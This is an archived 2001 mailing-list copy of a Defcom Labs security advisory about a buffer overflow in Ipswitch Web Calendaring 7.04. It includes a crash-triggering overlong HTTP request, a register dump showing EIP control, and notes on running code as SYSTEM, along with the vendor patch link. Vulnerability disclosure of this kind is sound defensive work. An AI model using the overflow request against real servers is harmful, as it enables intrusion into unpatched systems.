OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: andreas junestam (andreas.junestamdefcom.com)
Date: Fri Oct 12 2001 - 06:04:16 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    ======================================================================
                      Defcom Labs Advisory def-2001-29

             Ipswitch Web Calendaring 7.04 Buffer Overflow

    Author: Andreas Junestam <andreasdefcom.com>
    Release Date: 2001-10-12
    ======================================================================
    ------------------------=[Brief Description]=-------------------------
    When sending a request to the Web Calender (port 8484) longer than 97
    bytes, a overflow will occur and EIP will be overwritten.

    ------------------------=[Affected Systems]=--------------------------
    - Ipswitch Web Calendaring 7.04 and possibly earlier versions

    ----------------------=[Detailed Description]=------------------------
    Sending a request like:
    GET /'A' x 96 HTTP/1.0

    Generates:
    Access violation - code c0000005 (first chance)
    eax=07777101 ebx=00c338d8 ecx=016f99ec edx=016f99ec esi=0000007e
    edi=00000000 eip=61616161 esp=016f99fc ebp=61616161
    61616161 ?? ???

    This leaves us with the possibility to run code as SYSTEM. Mind though,
    the server does a ToLower on the buffer BEFORE the overflow occours,
    limiting the number of instructions we can use.
     
    ---------------------------=[Workaround]=-----------------------------

    Download the new version from:
    ftp://ftp.ipswitch.com/Ipswitch/Product_Support/IMail/IM704HF1.exe

    -------------------------=[Vendor Response]=--------------------------
    This issue was brought to the vendors attention on the 1st of
    October, 2001. Patch is released.

    ======================================================================
                This release was brought to you by Defcom Labs

            http://labs.defcom.com http://www.defcom.com
    ======================================================================